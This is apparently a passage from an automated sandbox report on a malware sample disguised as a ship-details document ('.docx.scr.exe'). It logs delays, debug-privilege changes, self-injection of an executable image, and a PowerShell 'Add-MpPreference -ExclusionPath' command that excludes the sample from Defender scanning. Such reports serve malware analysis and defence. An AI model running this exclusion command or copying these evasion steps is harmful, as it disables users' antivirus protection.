                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 597030Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 596921Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 596804Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 596694Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 596532Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 596406Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 596296Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 596187Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 596077Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 595968Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 595859Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 595749Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 595640Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 595531Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 595421Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 595312Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 595203Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 595093Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 594984Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 594874Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 594765Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 594654Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 594546Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 594437Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 594327Jump to behavior
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4162548189.0000000001516000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 3_2_06F8B9D0 LdrInitializeThunk,3_2_06F8B9D0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe"
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe"Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeMemory written: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe"Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess created: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe "C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe"Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
